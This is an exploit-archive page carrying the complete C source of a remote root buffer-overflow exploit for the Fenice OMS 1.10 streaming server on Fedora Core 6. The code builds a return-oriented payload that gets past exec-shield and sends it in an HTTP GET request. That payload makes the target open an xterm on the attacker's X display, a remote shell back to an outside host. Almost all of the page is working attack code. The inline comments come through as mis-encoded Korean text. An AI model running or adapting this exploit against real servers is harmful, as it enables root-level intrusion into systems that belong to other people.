exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

fenice-overflow.txt

fenice-overflow.txt
Posted May 3, 2007
Authored by Xpl017Elz | Site x82.inetcop.org

Fenice OMS server version 1.10 remote root buffer overflow exploit.

tags | exploit, remote, overflow, root
SHA-256 | ccb2a8ac8990e9209800f79b19078b6c4c6acc738a98dd5da1d2b538125e0ad6

fenice-overflow.txt

Change Mirror Download
/*
**
** Fedora Core 6 (exec-shield) based
** Fenice OMS server (fenice-1.10.tar.gz) remote root exploit
** by Xpl017Elz
**
** Advanced exploitation in exec-shield (Fedora Core case study)
** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt
**
** Reference: http://www.securityfocus.com/bid/17678
** vendor: http://streaming.polito.it/legacy_server
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
** My World: http://x82.inetcop.org
**
*/
/*
** -=-= POINT! POINT! POINT! POINT! POINT! =-=-
**
** This is a very common standalone daemon remote buffer overflow vulnerability.
** I used the method that I used on my proftpd exploit again to avoid random mapping library.
** And I'm plainning to publish it in English.
**
** http://x82.inetcop.org/h0me/papers/FC_exploit/FC_oneshot_exploit.txt
**
** Kaveh Razavi's exploit uses about 750Kb and mine uses 115Kb more.
**
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>


#define UNAME_PLT 0x8048e9c // <uname@plt> // randomÇÏ°Ô mappingµÇ´Â (execle()>>16)&0xff GOT 1byte¸¦ È®º¸Çϱâ À§ÇØ

#define STRCPY_PLT 0x08048ffc // <strcpy@plt>
#define MOVE_ESP 0x80569e5 // <__do_global_ctors_aux+37>: pop %ebx // retÀ» Æ÷ÇÔ ÃÑ 12byte À̵¿ (nergal's idea)

#define GETGID_GOT 0x8059234 // execle() ÇÔ¼ö ÁÖ¼Ò¸¦ ÀÓÀÇ·Î Á¶ÇÕÇÏ¿© ³ÖÀ» GOT ÁÖ¼Ò
/*
(gdb) x/x 0x8059234
0x8059234 <_GLOBAL_OFFSET_TABLE_+324>: 0x08049222
(gdb) x 0x08049222
0x8049222 <getgid@plt+6>: 0x00027068
(gdb)
*/
#define GETGID_PLT 0x0804921c // <getgid@plt> // GOT Á¶ÇÕ ÀÌÈÄ, PLT¸¦ ÅëÇØ execle() ÇÔ¼ö Çڵ鸵


#define EXECLE_16_0xff 0x8059156 // (execle()>>16)&0xff // uname ÇÔ¼öÀÇ 1byte: 0x!!0000
#define EXECLE_08_0xff 0x80591b5 // (execle()>>8)&0xff // bind ÇÔ¼öÀÇ 1byte: 0x00!!00
#define EXECLE_00_0xff 0x8048e83 // (execle()>>0)&0xff // ³ª¸ÓÁö Á¤ÀûÀÎ 1byte: 0x0000!!


/* Á¤ÀûÀ¸·Î Á¢±Ù °¡´ÉÇÑ ¹öÆÛ°¡ ÀÖÀ» °æ¿ì, ÇÊ¿ä ¾øÀ½ */
#define DATA_LOC 0x805af4c // heap ºó °ø°£À» ÀÌ¿ë


/* /usr/X11R6/bin/xterm */
#define ARG1_LOC 0x805af4c // Á¶ÇÕµÈ ¸í·É ½ÃÀÛ ÁÖ¼Ò (argv[0],argv[1]·Î ¾²ÀÓ)
#define SLASH_STR 0x8055acb // "/"
#define XTERM_STR_1 0x804875d // "us"
#define XTERM_STR_2 0x80585ce // "r/"
#define X_STR_1 0x8048df3 // "X"
#define R_STR 0x804a572 // "R"
#define XTERM_STR_3 0x804882c // "bin"
#define X_STR_2 0x8048e33 // "x"
#define XTERM_STR_4 0x8056a33 // "term"


/* -display */
#define ARG2_LOC 0x805af61 // Á¶ÇÕµÈ ¿É¼Ç ½ÃÀÛ ÁÖ¼Ò (argv[2]·Î ¾²ÀÓ)
#define DISPLAY_OPTION 0x80584b8 // "-di"


/* xhost_ip:0 */
#define ARG3_LOC 0x805af65 // Á¶ÇÕµÈ xhost IP ½ÃÀÛ ÁÖ¼Ò (argv[3]À¸·Î ¾²ÀÓ)
#define NUM_0 0x8053285 // "0"
#define NUM_1 0x804ef17 // "1"
#define NUM_2 0x804b37b // "2"
#define NUM_3 0x804d622 // "3"
#define NUM_4 0x804e583 // "4"
#define NUM_5 0x80554d7 // "5"
#define NUM_6 0x8052341 // "6"
#define NUM_7 0x804d14a // "7"
#define NUM_8 0x8048db3 // "8"
#define NUM_9 0x80516bb // "9"


#define COLON_STR 0x8057abb // ":"
#define NULL_STR 0x805afbe // 0x00000000


int main(int argc,char *argv[]){
int i=0,j=0;
struct hostent *se;
struct sockaddr_in saddr;
unsigned long ip,ip1,ip2,ip3,ip4;
unsigned char do_ex[4096];
unsigned char xhost_ip[256];
int sock;
char host[256];
int port=554;

memset((char *)do_ex,0,sizeof(do_ex));
ip=ip1=ip2=ip3=ip4;


printf("/*\n**\n** Fedora Core 6 (exec-shield) based\n"
"** Fenice OMS server (fenice-1.10.tar.gz) remote root exploit\n"
"** by Xpl017Elz\n**\n");
if(argc<2){
printf("** Usage: %s [host] [port] [xhost ip]\n",argv[0]);
printf("**\n** host: Fenice 1.10 Open Media Streaming Server\n");
printf("** port: default 554\n");
printf("** xhost ip: attacker xhost\n**\n");
printf("** Example: %s fenice.omss.co.kr 554 82.82.82.82\n**\n*/\n",argv[0]);
exit(-1);
}
else {
sscanf(argv[3],"%d.%d.%d.%d",&ip1,&ip2,&ip3,&ip4);
#define IP1 16777216
#define IP2 65536
#define IP3 256
ip=0;
ip+=ip1 * (IP1);
ip+=ip2 * (IP2);
ip+=ip3 * (IP3);
ip+=ip4;

memset((char *)xhost_ip,0,256);
sprintf(xhost_ip,"%10lu",ip);
}

memset((char *)host,0,sizeof(host));
strncpy(host,argv[1],sizeof(host)-1);
port=atoi(argv[2]);

se=gethostbyname(host);
if(se==NULL){
printf("** gethostbyname() error\n**\n*/\n");
return -1;
}
sock=socket(AF_INET,SOCK_STREAM,0);
if(sock==-1){
printf("** socket() error\n**\n*/\n");
return -1;
}

saddr.sin_family=AF_INET;
saddr.sin_port=htons(port);
saddr.sin_addr=*((struct in_addr *)se->h_addr);
bzero(&(saddr.sin_zero),8);


printf("** make exploit\n");
sprintf(do_ex,"GET /");
j=strlen(do_ex);
for(i=0;i<320;i++,j++){
sprintf(do_ex+j,"A");
}

#define __GOGOSSING(dest,index,src){\
*(long *)&dest[index]=src;\
index+=4;\
}

__GOGOSSING(do_ex,j,UNAME_PLT); /* uname GOT °ª ä¿ò */
// execle() ÁÖ¼Ò Á¶ÇÕ
{
i=0;
/* (execle()>>0)&0xff */
__GOGOSSING(do_ex,j,STRCPY_PLT);
__GOGOSSING(do_ex,j,MOVE_ESP);
__GOGOSSING(do_ex,j,GETGID_GOT+i++);
__GOGOSSING(do_ex,j,EXECLE_00_0xff);
/* (execle()>>8)&0xff */
__GOGOSSING(do_ex,j,STRCPY_PLT);
__GOGOSSING(do_ex,j,MOVE_ESP);
__GOGOSSING(do_ex,j,GETGID_GOT+i++);
__GOGOSSING(do_ex,j,EXECLE_08_0xff);
/* (execle()>>16)&0xff */
__GOGOSSING(do_ex,j,STRCPY_PLT);
__GOGOSSING(do_ex,j,MOVE_ESP);
__GOGOSSING(do_ex,j,GETGID_GOT+i++);
__GOGOSSING(do_ex,j,EXECLE_16_0xff);
}
// argv[0],argv[1]: /usr/X11R6/bin/xterm
{
i=0;
__GOGOSSING(do_ex,j,STRCPY_PLT);
__GOGOSSING(do_ex,j,MOVE_ESP);
__GOGOSSING(do_ex,j,DATA_LOC+i);
__GOGOSSING(do_ex,j,SLASH_STR);
i+=1; /* "/" */
__GOGOSSING(do_ex,j,STRCPY_PLT);
__GOGOSSING(do_ex,j,MOVE_ESP);
__GOGOSSING(do_ex,j,DATA_LOC+i);
__GOGOSSING(do_ex,j,XTERM_STR_1);
i+=2; /* "us" */
__GOGOSSING(do_ex,j,STRCPY_PLT);
__GOGOSSING(do_ex,j,MOVE_ESP);
__GOGOSSING(do_ex,j,DATA_LOC+i);
__GOGOSSING(do_ex,j,XTERM_STR_2);
i+=2; /* "r/" */
__GOGOSSING(do_ex,j,STRCPY_PLT);
__GOGOSSING(do_ex,j,MOVE_ESP);
__GOGOSSING(do_ex,j,DATA_LOC+i);
__GOGOSSING(do_ex,j,X_STR_1);
i+=1; /* "X" */
__GOGOSSING(do_ex,j,STRCPY_PLT);
__GOGOSSING(do_ex,j,MOVE_ESP);
__GOGOSSING(do_ex,j,DATA_LOC+i);
__GOGOSSING(do_ex,j,NUM_1);
i+=1; /* "1" */
__GOGOSSING(do_ex,j,STRCPY_PLT);
__GOGOSSING(do_ex,j,MOVE_ESP);
__GOGOSSING(do_ex,j,DATA_LOC+i);
__GOGOSSING(do_ex,j,NUM_1);
i+=1; /* "1" */
__GOGOSSING(do_ex,j,STRCPY_PLT);
__GOGOSSING(do_ex,j,MOVE_ESP);
__GOGOSSING(do_ex,j,DATA_LOC+i);
__GOGOSSING(do_ex,j,R_STR);
i+=1; /* "R" */
__GOGOSSING(do_ex,j,STRCPY_PLT);
__GOGOSSING(do_ex,j,MOVE_ESP);
__GOGOSSING(do_ex,j,DATA_LOC+i);
__GOGOSSING(do_ex,j,NUM_6);
i+=1; /* "6" */
__GOGOSSING(do_ex,j,STRCPY_PLT);
__GOGOSSING(do_ex,j,MOVE_ESP);
__GOGOSSING(do_ex,j,DATA_LOC+i);
__GOGOSSING(do_ex,j,SLASH_STR);
i+=1; /* "/" */
__GOGOSSING(do_ex,j,STRCPY_PLT);
__GOGOSSING(do_ex,j,MOVE_ESP);
__GOGOSSING(do_ex,j,DATA_LOC+i);
__GOGOSSING(do_ex,j,XTERM_STR_3);
i+=3; /* "bin" */
__GOGOSSING(do_ex,j,STRCPY_PLT);
__GOGOSSING(do_ex,j,MOVE_ESP);
__GOGOSSING(do_ex,j,DATA_LOC+i);
__GOGOSSING(do_ex,j,SLASH_STR);
i+=1; /* "/" */
__GOGOSSING(do_ex,j,STRCPY_PLT);
__GOGOSSING(do_ex,j,MOVE_ESP);
__GOGOSSING(do_ex,j,DATA_LOC+i);
__GOGOSSING(do_ex,j,X_STR_2);
i+=1; /* "x" */
__GOGOSSING(do_ex,j,STRCPY_PLT);
__GOGOSSING(do_ex,j,MOVE_ESP);
__GOGOSSING(do_ex,j,DATA_LOC+i);
__GOGOSSING(do_ex,j,XTERM_STR_4);
i+=4; /* "term" */
__GOGOSSING(do_ex,j,STRCPY_PLT);
__GOGOSSING(do_ex,j,MOVE_ESP);
__GOGOSSING(do_ex,j,DATA_LOC+i);
__GOGOSSING(do_ex,j,NULL_STR);
i+=1; /* null */
}
// argv[2]: -display
{
__GOGOSSING(do_ex,j,STRCPY_PLT);
__GOGOSSING(do_ex,j,MOVE_ESP);
__GOGOSSING(do_ex,j,DATA_LOC+i);
__GOGOSSING(do_ex,j,DISPLAY_OPTION);
i+=3; /* "-di" */
__GOGOSSING(do_ex,j,STRCPY_PLT);
__GOGOSSING(do_ex,j,MOVE_ESP);
__GOGOSSING(do_ex,j,DATA_LOC+i);
__GOGOSSING(do_ex,j,NULL_STR);
i+=1; /* null */
}
// argv[3]: xhost_ip:0
for(ip=0;ip<10;ip++){
__GOGOSSING(do_ex,j,STRCPY_PLT);
__GOGOSSING(do_ex,j,MOVE_ESP);
__GOGOSSING(do_ex,j,DATA_LOC+i);

switch(xhost_ip[ip]){
case '0':
__GOGOSSING(do_ex,j,NUM_0);
break;
case '1':
__GOGOSSING(do_ex,j,NUM_1);
break;
case '2':
__GOGOSSING(do_ex,j,NUM_2);
break;
case '3':
__GOGOSSING(do_ex,j,NUM_3);
break;
case '4':
__GOGOSSING(do_ex,j,NUM_4);
break;
case '5':
__GOGOSSING(do_ex,j,NUM_5);
break;
case '6':
__GOGOSSING(do_ex,j,NUM_6);
break;
case '7':
__GOGOSSING(do_ex,j,NUM_7);
break;
case '8':
__GOGOSSING(do_ex,j,NUM_8);
break;
case '9':
__GOGOSSING(do_ex,j,NUM_9);
break;
}
i+=1;
}
{
__GOGOSSING(do_ex,j,STRCPY_PLT);
__GOGOSSING(do_ex,j,MOVE_ESP);
__GOGOSSING(do_ex,j,DATA_LOC+i);
__GOGOSSING(do_ex,j,COLON_STR);
i+=1; /* ":" */
__GOGOSSING(do_ex,j,STRCPY_PLT);
__GOGOSSING(do_ex,j,MOVE_ESP);
__GOGOSSING(do_ex,j,DATA_LOC+i);
__GOGOSSING(do_ex,j,NUM_0);
i+=1; /* "0" */
__GOGOSSING(do_ex,j,STRCPY_PLT);
__GOGOSSING(do_ex,j,MOVE_ESP);
__GOGOSSING(do_ex,j,DATA_LOC+i);
__GOGOSSING(do_ex,j,NULL_STR);
i+=1; /* null */
}
// exploit
{
__GOGOSSING(do_ex,j,GETGID_PLT); // getgidÀÇ GOT´Â execle() ÇÔ¼ö¸¦ °¡Áö¹Ç·Î, PLT·Î Çڵ鸵 °¡´É.
__GOGOSSING(do_ex,j,0x82828282); // callÀÌ ¾Æ´Ï¹Ç·Î, ÀÌÀü ÇÔ¼ö %eip¸¦ ´ë½ÅÇؼ­ ä¿ò.
__GOGOSSING(do_ex,j,ARG1_LOC); /* argv[0] */
__GOGOSSING(do_ex,j,ARG1_LOC); /* argv[1] */
__GOGOSSING(do_ex,j,ARG2_LOC); /* argv[2] */
__GOGOSSING(do_ex,j,ARG3_LOC); /* argv[3] */
}
printf("** exploit size: %d\n",strlen(do_ex));

i=connect(sock,(struct sockaddr *)&saddr,sizeof(struct sockaddr));
if(i==-1){
printf("** connect() error\n**\n*/\n");
return -1;
}
else {
printf("** send exploit\n");
send(sock,do_ex,j,0);

printf("** sleepppppppp...\n");
sleep(1);
send(sock,"\n",1,0);
send(sock,"\n",1,0);
}
close(sock);

printf("** xhost, check it up, now!\n**\n*/\n");
exit(0);
}

/* eoc */


Login or Register to add favorites

File Archive:

July 2022

 • Su
 • Mo
 • Tu
 • We
 • Th
 • Fr
 • Sa
 • 1
  Jul 1st
  52 Files
 • 2
  Jul 2nd
  0 Files
 • 3
  Jul 3rd
  0 Files
 • 4
  Jul 4th
  11 Files
 • 5
  Jul 5th
  0 Files
 • 6
  Jul 6th
  0 Files
 • 7
  Jul 7th
  0 Files
 • 8
  Jul 8th
  0 Files
 • 9
  Jul 9th
  0 Files
 • 10
  Jul 10th
  0 Files
 • 11
  Jul 11th
  0 Files
 • 12
  Jul 12th
  0 Files
 • 13
  Jul 13th
  0 Files
 • 14
  Jul 14th
  0 Files
 • 15
  Jul 15th
  0 Files
 • 16
  Jul 16th
  0 Files
 • 17
  Jul 17th
  0 Files
 • 18
  Jul 18th
  0 Files
 • 19
  Jul 19th
  0 Files
 • 20
  Jul 20th
  0 Files
 • 21
  Jul 21st
  0 Files
 • 22
  Jul 22nd
  0 Files
 • 23
  Jul 23rd
  0 Files
 • 24
  Jul 24th
  0 Files
 • 25
  Jul 25th
  0 Files
 • 26
  Jul 26th
  0 Files
 • 27
  Jul 27th
  0 Files
 • 28
  Jul 28th
  0 Files
 • 29
  Jul 29th
  0 Files
 • 30
  Jul 30th
  0 Files
 • 31
  Jul 31st
  0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close